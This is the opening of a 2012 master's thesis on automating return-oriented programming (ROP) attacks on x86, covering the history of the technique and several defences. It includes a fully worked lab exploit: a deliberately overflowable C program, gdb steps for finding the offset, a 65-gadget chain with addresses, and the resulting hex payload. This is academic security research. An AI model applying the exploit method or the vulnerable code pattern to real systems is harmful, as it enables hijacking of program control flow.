AUTOMATING RETURN ORIENTEDATTACKS
ON x86 ARCHITECTURE
School of Computer and Communication SciencesProgramming Methods GroupÉcole Polytechnique Fédérale de Lausanne
A degree project submitted in partial fulfilmentof the requirements for the degree ofMaster of Computer Science of
Alen Stojanov
supervised by:
Prof. Dr. Marin OderskyProf. Dr. Michael Franz
Lausanne, EPFL, 2012
Acknowledgements
I would like to devote my utmost gratitude to my external thesis advisor, Prof. Dr.
Michael Franz for allowing me to join his team in the Secure Systems and Software
Laboratory at the University of California, Irvine, for his expertise, kindness, and most
of all, for ensuring positive and encouraging environment for performing research.
This work would not have been completed without help and support.
I am greatly indebted to Dr. Per Larsen and Dr. Stefan Brunthaler for their trust in
me and providing me with this opportunity to acquire the knowledge and expertise
in order to contribute to the support of the research project. Gaining their trust and
friendship made my work so much smoother.
I would like to express my appreciation to Prof. Dr. Martin Odesky for giving me
the opportunity participate in this research project, as well as, for being my internal
supervisor at EPFL.
Lausanne, 16 Mars 2012 A. S.
v
Abstract
Return oriented programming (ROP) is an exploit technique which avoids code injec-
tion by reusing existing code to induce arbitrary behavior in a program. ROP attacks
are conducted by chaining available instruction sequences (gadgets) ending in a “re-
turn” instruction. While the construction of ROP attacks has been automated, these
approaches rely on searching gadgets using predefined sequences which operate on a
fixed set of registers, on the grounds that large and widely distributed chunks of binary
code are likely to contain them. As a result, libraries and operating system kernels
have been targeted as gadget providers.
We propose an automatic gadget construction, targeting stand-alone executables,
without relying on libraries or the system kernel. Due to the possible limit of available
gadgets, stand-alone executables are likely to be restricted on instructions operating
on distinct registers. Subsequently, chaining instructions so that the result of one
instruction is used in the consecutive instructions can be achieved only by moving
data across registers. For that purpose, we build a graph representing register manip-
ulation instruction sequences (mov, xchg, add, sub, etc). Each register represents a
node, and each data movement across registers represents an edge. The strongly con-
nected components in the graph provide the available registers, and the shortest paths
among those registers describe instruction chaining with minimal data movements.
Customizing the gadget search to the available registers increases the flexibility when
automatically constructing attacks, allowing the attacks to be applied on stand-alone
executables, and minimal data movements help optimize the generated attacks.
vii
Contents
Acknowledgements v
Abstract vii
Introduction 1
1 Introduction 1
1.1 Thesis outline . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
2 Background 3
2.1 Return Oriented Programming (x86) . . . . . . . . . . . . . . . . . . . . . 3
2.1.1 Intended and Unintended Instructions . . . . . . . . . . . . . . . 6
2.1.2 Return Oriented Programming Attack: Fibonacci Sequence . . . 6
2.2 Jump Oriented Programming . . . . . . . . . . . . . . . . . . . . . . . . . 12
2.3 Architectural aspects . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
2.4 Defence Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
2.4.1 W⊗
X and ASLR . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
2.4.2 Return-Less Kernels . . . . . . . . . . . . . . . . . . . . . . . . . . 15
2.4.3 HyperCrop . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
2.4.4 ROPdefender . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
2.4.5 G-Free . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
2.4.6 Control Flow Integrity . . . . . . . . . . . . . . . . . . . . . . . . . 18
3 Related Work 21
3.1 Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
3.2 Return Into libc Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
3.3 Reverse Engineering Intermediate Language . . . . . . . . . . . . . . . . 23
3.4 Return Oriented Rootkits . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
4 Automatic Return Oriented Programming 27
4.1 Process Image Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29
4.2 Gadget Locations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
ix
Contents
4.3 Considering Gadget Side-Effects . . . . . . . . . . . . . . . . . . . . . . . 32
4.4 Gadget Classification . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
4.5 Building the Register Transfer Graph . . . . . . . . . . . . . . . . . . . . . 34
4.5.1 Register Clobbering Edges . . . . . . . . . . . . . . . . . . . . . . . 36
4.5.2 Memory Transfer Nodes . . . . . . . . . . . . . . . . . . . . . . . . 37
4.6 Discovering Register Candidates . . . . . . . . . . . . . . . . . . . . . . . 37
4.7 Encapsulation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38
5 Evaluation 43
6 Conclusion 456.1 Contribution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45
6.2 Future Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46
Bibliography 50
x
1 Introduction
Software flaws or vulnerabilities are frequently the underlying causes of information
security incidents. The constantly evolving world of software, increases the complexity
of the deployed applications, and consequently it becomes increasingly difficult to
guarantee that a developed software is a bug-free software. The fundamental security
issues occur at software vendors that follow the policy of “sell today and fix it tomor-
row”, dictated by the need to launch products quickly before competitors. Therefore
producing software containing unintentional bugs and flaws is almost inevitable. Vari-
ous individual such as hackers, security firms and academic researchers are interested
in finding flaws in other vendors’ software, and are also interested in creating genuine
attack techniques to exploit the identified flaws.
Return-oriented programming (ROP) is an attack technique exploiting software vul-
nerabilities. It emerged as part of community work, and transitioned later to the
academic world, after first published by Hovav Schacham [1]. The fundamental use of
this technique is to induce arbitrary behaviour in a program whose control flow has
been diverted, without injecting any code. The threat of ROP attacks is eminent across
many architectures including x86, ARM, SPARC, Atmel AVR, PowerPC, etc [1, 2, 3, 4, 5].
As a result, many day-to-day devices are affected, including smart phones and tablets
running on ARM architecture, even voting machines [6], used during elections in the
past.
The popularity of ROP is mainly based on its ability to bypass almost all widely de-
ployed protection mechanisms, such as W⊗
X and ASLR [7, 8, 9]. The current de-
velopments in defence techniques produce systems that either introduce excessive
performance overhead, ere able to detect / protect against ROP in a very constrained
environment, or simply are not deployed on systems they are designed to protect
[10, 11, 12, 13, 14, 15]. Subsequently many techniques are being developed to autom-
atize the ROP attack generation [16, 17, 18, 19]. Most of the techniques target shared
1
Chapter 1. Introduction
libraries, or operating system kernels, which in fact represent environments with a
large pool of reusable chunks of binary code (gadgets). The process of automation
depends on matching predefined set of template instructions, operating on fixed set
of CPU registers.
Our focus in this thesis report are stand-alone executables, where the availability of
reusable code is significantly reduced, due to the size of the binary. As a result, the
generation of code reuse attacks on stand-alone binaries, is quite tedious, even when
done manually. Our system automatize the creation of ROP attacks by:
• Automatically extracting gadgets from a target binary
• Careful consideration on the side effects introduced by execution of each gadget
• Analysis on the data transfer between registers and memory
• Automatic gadget chaining using the data transfer relations between the CPU
registers and memory
Finally we analyse a set of popular applications available across different Linux distri-
bution, and show that the automatic creation of ROP attacks is possible and is directly
dependant on the size of the target binary.
1.1 Thesis outline
The rest of the thesis report is organized as follows:
• Chapter 2 gives a detailed explanation on the fundamental of the code reuse at-
tacks, their evolution and variations, provides a through generation of a practical
attack, and discusses the unassailability of the current defence mechanisms.
• Chapter 4 defines the contribution in this project, providing comprehensive
elaboration on mechanisms used to automate the generation of return oriented
attacks.
• Chapter 5 presents the results obtained using the system to generate automatic
return oriented attacks, provides comparison with other systems and evaluates
the level of automation achieved on variety of stand-alone executables.s
• Finally, the conclusion and future work ideas are covered in Chapter 6
2
2 Background
Building software, that provides an adequate level of security assurance, becomes
increasingly challenging as the size and the complexity of software creation increases.
Developers are burden not only to deliver a correct and optimal solution to a problem,
but they must also ensure that they have protected every relevant potential vulner-
ability. Yet, in order to attack a particular software, attackers often have to find and
exploit only a single exposed vulnerability.
The traditional vulnerabilities are represented by buffer overflow on the stack [20],
buffer overflow on the heap [21], integer overflows [22] and format string vulnerabili-
ties [23]. The techniques to exploit any of the vulnerabilities mentioned above vary per
architecture and operating system. Return oriented programming exhibits another
technique that utilizes the existence of a vulnerability in creating arbitrary attacks such
that it applies to many widely deployed architectures. Attacker using this technique
must accomplish two tasks: he must find some way to subvert the program’s control
flow from its normal course, and he must force the program to act in the manner of his
choosing. Therefore, we concentrate on the classical stack-smashing vulnerabilities
and describe the fundamentals of this technique.
2.1 Return Oriented Programming (x86)
Return oriented programming (ROP) is a technique to force computers to behave
maliciously without injecting malicious code in the system. Assuming that a vulnera-
bility is discovered in a particular program, an attacker is able to subvert the program
control from its normal course by indirectly executing cherry-picked machine instruc-
tions or groups of machine instructions already present in the program. As a result,
the technique circumvents most widely deployed measures that try to prevent the
execution originating from user-controlled memory [7].
3
Chapter 2. Background
The very first academic work describing the technique of return oriented program-
ming was published by Hovav Shacham’s “The Geometry of Innocent Flesh on the
Bone: Return-into-libc without function Calls (on the x86)” [1]. However, the idea
of code reuse attacks has been drifting around mailing lists, forums and computer
security magazines long before it was acknowledged by the academic world. Inspired
by the discovery of the buffer overflow vulnerability, the technique improved overtime,
as shown on the retrospective timeline bellow.
1972 • First publication on buffer overflow attacks [24]
1988 • “The Moris” worm released [25]
1995 • Initial rediscovery of buffer overflow attacks [26]
1996 • Step-by-step introduction for exploiting stack-based buffer overflow [20]
1997 • Non-executable stack patches are defeated [27]
1997 • “Instruction chaining” first introduced on BugTraq [28]
1999 • Return to lib(c) is introduced on Solaris / SPARC [29]
2000 • Community discussion on code reuse techniques [30]
2001 • Advanced attacks using return to lib(c) are introduced [31]
2001 • Core Red Worm infects more than 300.000 PCs, using code reuse techniques [32]
2005 • Exploitation on x86-64 using borrowed code chunks [33]
2007 • Return Oriented Programming by Hovav Shacham [1]
2008 • ROP attacks on harvard-architecture devices [4]
2008 • Router exploitation using ROP on PowerPC architecture [5]
2008 • Generalization of ROP attacks on RISC [2]
2009 • REIL return oriented programming on ARM [3]
2009 • Exploiting AVC voting machines [6]
2009 • Rootkits for the Windows kernel using ROP [19]
2010 • Framework for automated architecture independent search [18]
2010 • Return Oriented Programming without returns [34]
2010 • Corelan releases pvefindaddr to simplify the exploit building process
2011 • Jump Oriented Programming defined [35]
2011 • Advanced techniques: packed, printable, and polymorphic ROP [36]
2011 • Cross-architectural ROP attacks by libc function chaining [17]
To illustrate the essence of a return oriented attack we assume that the target is a
4
2.1. Return Oriented Programming (x86)
Linux binary having a stack buffer overflow vulnerability, as mentioned above. As soon
as the binary is loaded by the operating system, it becomes a Linux process having
the corresponding libraries mapped into memory. The text segment of the process,
as well as the memory mapped regions, contain chunks of binary code. Once the
vulnerability of the program is exploited, we assume that the return address of the
stack is overwritten. If the value of the overwritten address points to a valid machine
instruction that resides in one the sections containing binary code, the control flow of
the program will be subverted to sequentially execute the instructions starting at the
overwritten address. If the set of following instructions ends with a return instruction,
the control flow of the program will be subverted again to the next address available
on the stack. We call this set of instructions gadgets.
...0x555A08 EAX = “white”0x555A0C RETURN
Display_ColorText
...0xABCD00 SUBI #5000, @EBX0xABCD04 RETURN
Audio_LowerVolume
...0x777700 JSR strg_concat_EAX_EBX0x777704 RETURN
FileSystem_DirectoryName
...0x212500 EBX = “keyboard”0x212504 else0x212508 EBX = “mouse”0x21250C RETURN
HelpTexts_IOSpecific
...0x919100 JSR open_connection0x919104 RETURN
PrintManager_Prepare
0x00000000
Data Segment
BSS segment
Heap
Stack
Text Segment
Memory Mapping
Illustration of a simplified jail-break attack using Return Oriented
Programming
Gadgets are located in the executable memory segments of the process
0xb70001E0
0xb70001C0
0xb70001A0
0xb7000180
0xb7000160
0xb7000140
0x00555A08
0xb7000120
0x00212508
0xb7000100
0x00ABCD00
0xb70000E0
0x00777700
0xb70000C0
0x00919100
0xb70000A0
0xb7000080
0xb7000240
0xb7000220
0xb7000200
EAX: whiteEBX:
EAX: whiteEBX: mouse
EAX: whiteEBX: house
EAX: whitehouseEBX: house
connected to whitehouse
Figure 2.1: Simplified jail-break attack using ROP
By carefully aligning addresses on the stack, chosen from gadgets available in the
5
Chapter 2. Background
target, the attacker can induce arbitrary behaviour in the system. Figure ?? illus-
trates simplified jail-break ROP attack on a Linux binary. It easy to see how harmless
and common instruction segments can modify the state of the application to cause
malevolent behaviour.
2.1.1 Intended and Unintended Instructions
The x86 architecture has a variable instruction length ranging from 1 byte to 15 bytes
per instruction and has no alignment on the binary code. The CPU is therefore able
to fetch binary code at any location in memory, and execute it, if the bytes of that
code represent valid x86 instructions. For example, we assume that the following
instruction is given:
8d bc 31 d6 07 37 c3 lea -0x3cc8f82a(%ecx,%esi,1), %edi
If we disregard the first two bytes, and start from the third byte, we get a complete
different set of instructions:
31 d6 xor %edx, %esi07 pop %es37 aaac3 ret
As a result, we define two sets of instructions intended and unintended instructions
[37]. Since we are interested in instructions ending with a return statement, repre-
sented with the c3 or c2 bytes, any unindented instruction ending with those bytes
can be considered as candidate for the ROP attack, if it decodes to a valid x86 instruc-
tion. How often such instructions occur depend on the characteristic of the machine
language in question, which Shacham [1] calls it geometry of the language, claiming
that in any sufficiently large body of x86 executable code there will exist sufficiently
many useful code sequences to cause the exploited program to undertake arbitrary
computation’.
2.1.2 Return Oriented Programming Attack: Fibonacci Sequence
To illustrate a practical ROP attack, we use a dummy program, which has a buffer
overflow bug. The program dummy.c source is the following:
1 #include <stdio.h>2 #include <string.h>3 #include <stdlib.h>
6
2.1. Return Oriented Programming (x86)
4
5 int main(int argc , char *argv [])6 {7 unsigned char buf [1];8 read(0, buf , 2048);9 printf ("%c\n", buf [0]);
10 return 0;11 }
Obviously any input greater than 1 character will potentially lead to a Segmentation
fault. The program is compiled with gcc 4.4.5-8 on Debian 5.0 (x86), and linked
with libc 2.11-1:
astojanov@debian-vbox:~/workspace/fROP$ ldd dummylinux-gate.so.1 => (0xb7fe4000)libc.so.6 => /lib/i686/cmov/libc.so.6 (0xb7e97000)/lib/ld-linux.so.2 (0xb7fe5000)
This means that we can use the gadgets available in the binary, as well as the gadgets
linked to libc. Before the ROP attack is crafted, we need to calculate the offset on the
stack where the return address resides. Note that the offset length varies on different
distributions and different compilers. The offset is determined experimentally using
gdb, by feeding the input of the dummy program with a random number of characters.
We start with 7 ’x’ characters:
(gdb) file dummyReading symbols from dummy...(no debugging symbols found)...done.(gdb) runStarting program: dummyxxxxxxxxProgram exited normally.
This listing above shows that than 7 bytes are not enough to overwrite the return
address. Therefore we repeat the same process with 15 bytes of input characters:
(gdb) runStarting program: dummyxxxxxxxxxxxxxxxxProgram received signal SIGSEGV, Segmentation fault.0xb70a7878 in ?? ()
7
Chapter 2. Background
In this case, the program fails with a segmentation fault, as a result of overwritten
return address. As the return address is consisted of 32 bits, we can notice that 2
bytes of the address are overwritten with the ASCII code of ’x’ character, which in
this case is 78. Thus, we can conclude that stack offset to the return address is 13
bytes. In order to implement the logic of the Fibonacci sequence, the first step is to
find available gadgets. We use a modified version of the Galileo algorithm [1], looking
at c3 and c2 bytes and backtracking from those bytes to find valid x86 instruction.
Similarly pop reg followed by jmp reg instructions are also considered, since the
combination of those instruction is equivalent to a return instruction. The search
resulted in obtaining 18419 gadgets from the binary and the corresponding linked
libraries (libc and linux-gate).
The initial observation over the functionality of the obtained gadget is the use of the
pop gadgets. The pop instruction pops an element from the stack, increasing the value
of the esp. Since values are placed on the stack when crafting a ROP attack, each use
of the pop instruction will result in populating the value of the register with the next
address on the stack as illustrated on Figure 2.2. Therefore this type of gadgets can be
used to initialize values of registers.
pop %edireturn
Figure 2.2: pop gadgets used for initialization
In our Fibonacci attack, registers edx and edi will be used as numbers Fn and Fn+1
in the Fibonacci sequence (initialized with values 1 and 2). The attack is represented
descriptevly, such that each line indicates the gadget sequential count, the address of
the gadget, the hex descriptions of the bytes of that gadget, as well as the assembly
translation of those bytes:
01: 0xB7F6E16D: hexa:"5a |c3" text:"pop %edx ; ret"02: 0x0000000103: 0xB7F4CD28: hexa:"5f |c3" text:"pop %edi ; ret"04: 0x00000001
Ecx will be used to track the number count in the sequence. We initialize it with value
10, to calculate the 10th Fibonacci number, and decrease it twice, since we already
have the first two numbers (ebx is initialized with a junk value):
05: 0xB7F6E197: hexa:"59 |5b |c3" text:"pop %ecx ; pop %ebx ; ret"
8
2.1. Return Oriented Programming (x86)
06: 0x0000000A07: 0xDEADBEEF08: 0xB7F5D116: hexa:"ff c9 |c3" text:"dec %ecx ; ret"09: 0xB7F5D116: hexa:"ff c9 |c3" text:"dec %ecx ; ret"
We now start the loop. In order to use gadget at position #13, we must ensure that the
instruction incl 0x5D5B14C4(%ebx) will write to a writeable section in the memory
process. Therefore we initialize ebx with value of 0x62A4E2D4, which will result in
increasing the value of address 0xBFFFF798 by the gadget at position 13.
10: 0xB7F6E198: hexa:"5b |c3" text:"pop %ebx ; ret"11: 0x62A4E2D4
The next 3 instructions depict the “Fibonacci magic”. esi serves as a temorpary
variable and we have: esi = edx, edx = edi and finally edi = edi + esi
12: 0xB7F0964F: hexa:"89 d6 |c3" text:"mov %edx, %esi ; ret"13: 0xB7F9E479: hexa:"89 fa |ff 83 c4 14 5b 5d |c3"
text:"mov %edi, %edx ; incl 0x5D5B14C4(%ebx) ; ret "14: 0xB7EBFF62: hexa:"01 f7 |c2 00 00" text:"add %esi, %edi ; ret"
Conditional branching is one of the most challenging parts of the ROP. In order to
implemented it, we use the CF flag. Namely this flag is changed every time certain
instructions are used, usually when an overflow occurs as a result of performing
subtraction or addition. Therefore we can use this flag to determine whether a < b,
since this flag will be set when performing a−b if the condition is valid. In this context
the value of ecx is compared with 1:
15: 0xB7F61F8B: hexa:"91 |c2 00 00" text:"xchg %ecx, %eax ; ret"16: 0xB7F6131A: hexa:"83 e8 01 |c3" text:"sub $0x01, %eax ; ret"17: 0xB7F61F8B: hexa:"91 |c2 00 00" text:"xchg %ecx, %eax ; ret"
Once the CF flag is set, lahf is used to load the flag into the least significant bit of ah.
18: 0xB7F5CD5D: hexa:"9f |c3" text:"lahf ; ret"
Currently CF is already loaded into eax, therefore we shift eax 4 bits to the right, so it
gets value of 0 or 64, according to the initial value of CF flag.
19: 0xB7F65659: hexa:"25 00 01 00 00 |c3" text:"and $0x100,%eax ; ret"20: 0xB7EF5D47: hexa:"c1 f8 02 |c3" text:"sar $0x02, %eax ; ret"
9
Chapter 2. Background
In order to do the conditional jump, we use the value of eax to modify the esp. Since
eax holds the value of 64 or 0, we can add eax to esp. This will result in either going
to the next gadget address on the stack, or 64/4 = 16 addresses later. However espcan not be modified directly and we need 5 gadgets to set its value. We take this into
consideration and offset esp for 5 32bit addresses via ebx. Note that esp gets added
into ebp on position #25 and gets the stack address of that instruction.
21: 0xB7F82DD3: hexa:"5d |c3" text:"pop %ebp ; ret"22: 0x0000000023: 0xB7F6E198: hexa:"5b |c3" text:"pop %ebx ; ret"24: 0x0000001425: 0xB7F3CBC2: hexa:"03 ec |c3" text:"add %esp, %ebp ; ret "26: 0xb7ff5e6a: hexa:"01 eb |c3" text:"add %ebp, %ebx ; ret "27: 0xB7F61F8B: hexa:"91 |c2 00 00" text:"xchg %ecx, %eax ; ret"28: 0xB7F60B8C: hexa:"01 d9 |c3" text:"add %ebx, %ecx ; ret "29: 0xB7F61F8B: hexa:"91 |c2 00 00" text:"xchg %ecx, %eax ; ret"30: 0xB7FCD854: hexa:"94 |c2 00 00" text:"xchg %esp, %eax ; ret"
If the control flow of the attack reaches position #31, that means that CF was 0 on
position #16. This also means that our representation of the N number, which gets
decreased on every iteration (inst 15 - 17), is greater or equal to 1. We need to jump
back to the start of the loop. Note that ebx still holds the value of esp+0x14 obtained
at instruction 26. Therefore we need to jump back to position #10. Therefore, we need
to decrease esp for 16 positions, and subtract the offset of 0x14. That is: 16 ·4+ 0x14
= 84 (0x54). We load -0x54 in eax and use the same trick to modify the value of esp.
31: 0xB7F64321: hexa:"58 |c3" text:"pop %eax ; ret"32: 0x0000005433: 0xB7F9E996: hexa:"f7 d8 |c3" text:"neg %eax ; ret"34: 0xB7F61F8B: hexa:"91 |c2 00 00" text:"xchg %ecx, %eax ; ret"35: 0xB7F60B8C: hexa:"01 d9 |c3" text:"add %ebx, %ecx ; ret "36: 0xB7F61F8B: hexa:"91 |c2 00 00" text:"xchg %ecx, %eax ; ret"37: 0xB7FCD854: hexa:"94 |c2 00 00" text:"xchg %esp, %eax ; ret"
Since the control flow jumps for 0 or 16 positions, esp will never point to this part of
the stack. Therefore, it is a free space, and we can use it to display a message on the
screen stating that Fibonacci sequence has been completed.
38: 0x6f626946: "Fibo"39: 0x6363616e: "nacc"40: 0x6f642069: "i do"41: 0x202e656e: "ne. "
10
2.1. Return Oriented Programming (x86)
42: 0x206e7552: "Run "43: 0x6f686365: "echo"44: 0x0a3f2420: " $?\n"45: 0x00000000: ""46: 0x00000000:
If position #47 is reached, that means that N is 0, and we are done with the Fibonacci
sequence. The last thing left is to somehow reproduce the result. The first thing we do
is call sys_write system call, and we inform the user that calculation of Fibonacci
has completed.
In order to print on the screen using the system call, ecx is set to the address of
instruction 38. ebx is set to 1 (so it writes to the standard output) and edx is set to 29,
which is 0x1d, representing the size of the string being written. eax must be set to 1,
to represent the proper system call
47: 0xB7F6E197: hexa:"59 |5b |c3" text:"pop %ecx ; pop %ebx ; ret "48: 0x0000003049: 0x0000000050: 0xb7ff5e6a: hexa:"01 eb |c3" text:"add %ebp, %ebx ; ret "51: 0xB7F60B8C: hexa:"01 d9 |c3" text:"add %ebx, %ecx ; ret "52: 0xB7F4C31E: hexa:"5b |c3" text:"pop %ebx ; ret "53: 0x0000000154: 0xB7F6E16D: hexa:"5a |c3" text:"pop %edx ; ret"55: 0x0000001d56: 0xB7F64321: hexa:"58 |c3" text:"pop %eax ; ret"57: 0x0000000458: 0xb7fe3830: hexa:"cd 80 |c3" text:"int $0x80 ; ret"
Finally transfer the value of edi (the n-th Fibonacci) and write it to the exit code of
the program using system call again.
59: 0xB7F6E198: hexa:"5b |c3" text:"pop %ebx ; ret"60: 0x62A4E2D461: 0xB7F9E479: hexa:"89 fa |ff 83 c4 14 5b 5d |c3"
text:"mov %edi, %edx ; incl 0x5D5B14C4(%ebx) ; ret"62: 0xB7F518C2: hexa:"89 d3 |c3" text:"mov %edx, %ebx ; ret"63: 0xb7ff8efc: hexa:"31 c0 |c3" text:"xor %eax, %eax ; ret"64: 0xb7fe82c3: hexa:"40 |c3" text:"inc %eax ; ret"65: 0xb7fe3830: hexa:"cd 80 |c3" text:"int $0x80 ; ret"
Once the addresses are taken into consideration, and the rest of the description in
terms of bytes and text is stripped, the binary payload will look as follows (generated
by bvi viewer):
11
Chapter 2. Background
00000000 78 78 78 78 78 78 78 78 78 78 78 78 78 6D E1 F6 xxxxxxxxxxxxxm..00000010 B7 01 00 00 00 28 CD F4 B7 01 00 00 00 97 E1 F6 .....(..........00000020 B7 0A 00 00 00 EF BE AD DE 16 D1 F5 B7 16 D1 F5 ................00000030 B7 98 E1 F6 B7 D4 E2 A4 62 4F 96 F0 B7 79 E4 F9 ........bO...y..00000040 B7 62 FF EB B7 8B 1F F6 B7 1A 13 F6 B7 8B 1F F6 .b..............00000050 B7 5D CD F5 B7 59 56 F6 B7 47 5D EF B7 D3 2D F8 .]...YV..G]...-.00000060 B7 00 00 00 00 98 E1 F6 B7 14 00 00 00 C2 CB F3 ................00000070 B7 6A 5E FF B7 8B 1F F6 B7 8C 0B F6 B7 8B 1F F6 .j^.............00000080 B7 54 D8 FC B7 21 43 F6 B7 54 00 00 00 96 E9 F9 .T...!C..T......00000090 B7 8B 1F F6 B7 8C 0B F6 B7 8B 1F F6 B7 54 D8 FC .............T..000000A0 B7 46 69 62 6F 6E 61 63 63 69 20 64 6F 6E 65 2E .Fibonacci done.000000B0 20 52 75 6E 20 65 63 68 6F 20 24 3F 0A 00 00 00 Run echo $?....000000C0 00 00 00 00 00 97 E1 F6 B7 30 00 00 00 00 00 00 .........0......000000D0 00 6A 5E FF B7 8C 0B F6 B7 1E C3 F4 B7 01 00 00 .j^.............000000E0 00 6D E1 F6 B7 1D 00 00 00 21 43 F6 B7 04 00 00 .m.......!C.....000000F0 00 30 38 FE B7 98 E1 F6 B7 D4 E2 A4 62 79 E4 F9 .08.........by..00000100 B7 C2 18 F5 B7 FC 8E FF B7 C3 82 FE B7 30 38 FE .............08.00000110 B7 .
When the payload is used as an input to the dummy program, the following results
are obtained:
astojanov@debian-vbox:~/workspace/fROP$ ./dummy < payload.binxFibonacci done. Run echo $?astojanov@debian-vbox:~/workspace/fROP$ echo $?89
2.2 Jump Oriented Programming
As mentioned before, ROP as a concept, can be instrumented in many ways and
applied on different architectures. Return oriented programming without returns
[34], introduced on x86 and ARM architectures, is another method to implement ROP
attacks. In this method, instead of looking for gadgets ending in a return instruction,
the emphasis is on gadgets ending in the return-like instructions sequences of the form
“pop reg; jmp reg” on the x86 architecture and the update-load-branch return-like
instruction on the ARM architecture. Many other equivalent instruction sequences are
also considered, as gadgets ending in a an indirect jump instructions, where combined
with even a single update-load-branch instruction sequence it is possible to build
a reusable trampoline which will transfer the control-flow of the attack to the next
instruction. The author proves that in sufficiently large libraries, as libc, it is possible
12
2.3. Architectural aspects
to build a gadget set of Turing-complete functionality to build arbitrary attacks.
...0x555A08 EAX = “white”0x555A0C JMP
Display_ColorText
...0xABCD00 SUBI #5000, @EBX0xABCD04 JMP
Audio_LowerVolume
...0x777700 JSR strg_concat_EAX_EBX0x777704 JMP
FileSystem_DirectoryName
...0x212500 EBX = “keyboard”0x212504 else0x212508 EBX = “mouse”0x21250C JMP
HelpTexts_IOSpecific
...0x919100 JSR open_connection0x919104 JMP
PrintManager_Prepare
0x00555A08
0x00212508
0x00ABCD00
0x00777700
0x00919100
Dispacher
Figure 2.3: Jump Oriented Programming
Jump-oriented programming presents another variation of return oriented program-
ing to be also proven Turing-complete. The new approach eliminates the reliance on
the stack and return instructions seen in return-oriented programming. Unlike ROP,
where after the execution of a particular gadget, the control flow returns back to the
stack to follow the next address, JOP performs an uni-directional control-flow transfer
to its target. Instead of having gadgets ending in a return instruction, each gadget
in a JOP attack ends in a jmp instruction. The attack relies on a dispatcher gadget,
which essentially maintains a virtual program counter able to navigate the gadgets to
advance from one gadget to the other, as illustrated on Figure 2.3
2.3 Architectural aspects
The fact that return oriented programming represents an universal thread, can be
easily elucidated by the fact that ROP attacks are not limited to variable length in-
structions such as x86. Architecture as RISC / SPARC, share almost no properties with
the x86 architecture. As the SPARC architecture has a fixed-width instruction length,
and alignment is enforced on instruction read, unintended instruction are no longer
possible to be used when crafting the return oriented attacks, which significantly re-
duces the set of available gadgets. However stack overflow are still possible on SPARC
13
Chapter 2. Background
and the rich set of register, combined with the 4000 return instructions in the Solaris
libc implementation was shown to be enough to create ROP attacks [2].
Similarly to the SPARC architecture, the thread of ROP has also been extended to
support another RISC architecture, namely ARM [3], affecting many smart-phones
and mobile and embedded devices. Although the implementation and the focus
of this work was on Windows Mobile, the technique can be ported on any other
operating system based on the architecture. The real-world use case of ROP has also
been depicted when AVC Advantage Harvard machines were shown to be exploitable
[6], which were used as a voting machines for elections in United States in the past.
Other affected architectures are also Atmel AVR [4] and Power PC [5].
2.4 Defence Techniques
The discovery of the first buffer overflow attack, initiated the need to develop adequate
protection mechanisms to address the potential vulnerabilities. As the sophistication
of the attacks was increasing, many techniques were developed to mitigate against
code reuse attacks. Taking into account strong adversaries, the effectiveness of those
systems can still be challenged to show that ROP and its variations still exists as a valid
thread, especially in environments where those systems are not deployed.
2.4.1 W⊗
X and ASLR
Stack smashing attacks, when initially discovered, were quite popular, as the exploita-
tion of those vulnerabilities was quite simple. As soon as the attacker was able to
change the return address on the stack, it was also possible to inject an arbitrary
machine code on the stack, directing the machine to execute the injected code. To
address this issue, the “W⊗
X” protection model emerged, marking memory regions
as writeable or executable, but never both. Therefore, the model prevented the at-
tackers to inject attack code, as diverting the control flow of the program would have
caused a processor exception. Being a sufficiently strong mitigation, the model was
soon adopted by CPU manufactures, by the name NX bit (No eXecute), and was incor-
porated in many modern operating systems. Intel introduced the XD bit, AMD the
Enhanced Virus Protection, and ARM the XN bit. Microsoft implemented Data Execu-
tion Prevention (DEP) [38], supporting software and hardware based data protection,
Linux adopted PaX [7] to utilize the NX bit, as well as to emulate it, on architectures
where it was not supported. Red Had introduced ExecShield [9]. Mac OS X, FreeBSD,
OpenBSD, NetBSD, Solaris and Andorid also incorporated the protection mechanisms
in their implementation.
14
2.4. Defence Techniques
W⊗
X as a protection model was only able to provide security until the code reuse
attacks appeared. To palliate against the new approaches, address space layout ran-
domization (ASLR) [8] was introduced. The model enforces random arrangement of
libraries, heap and stack space within process address space. The arbitrary offsets
in the dynamic libraries, as well as the heap and stack space hinder the creation of
ROP attacks, especially return-to-libc attacks, hardening the prediction of the position
of the gadget used in the attacks. Similarly to the W⊗
X, ASLR was incorporated
as part of PaX in Linux and OpenBSD, Microsoft included implementation in DEP,
followed by Mac OS X, iOS and Android. Although ASLR resembles a very strong
mitigation against code reuse attacks, it was latter demonstrated how this system
can be bypassed by a derandomization attack [39], converting any standard buffer
overflow attack to affect systems where ASLR is enabled. The derandomization attack
exploited the fact that ASLR does not randomize the stack layout, by brute-forcing the
attack to pinpoint the location of libc. Having into consideration that it only took
216 seconds to compromise Apache, the derandomization attack can be used in a
scenario where it can locate the positions of a gadgets to initiate a ROP attack.
2.4.2 Return-Less Kernels
Building an operating system with return-less kernel was an attempt to remove the
threat of return oriented attacks designated to escalate access privileges in the operat-
ing systems [10]. The author used a compiler based approach to generate the FreeBSD
kernel without returns, and without return opcodes. Instead of using the traditional
call convention where the return address is pushed on the stack, a return index
is pushed on the stack. This index corresponds to an index in a centralized return
address table, containing all valid return addresses permitted in the kernel. Once
return is invoked, the return index is popped from the stack, and the control flow
of the program is subverted to the corresponding return address. As there are finite
number of call instructions within the kernel implementation, the return address
table is static, and therefore it can be pre-generated according to the locations of the
call instructions.
The implementation of the approach, systematically changes each call and returninstructions with functionality to push a return index on the stack, and restore the
index value stored in the return addresses table, effectively removing all return in-
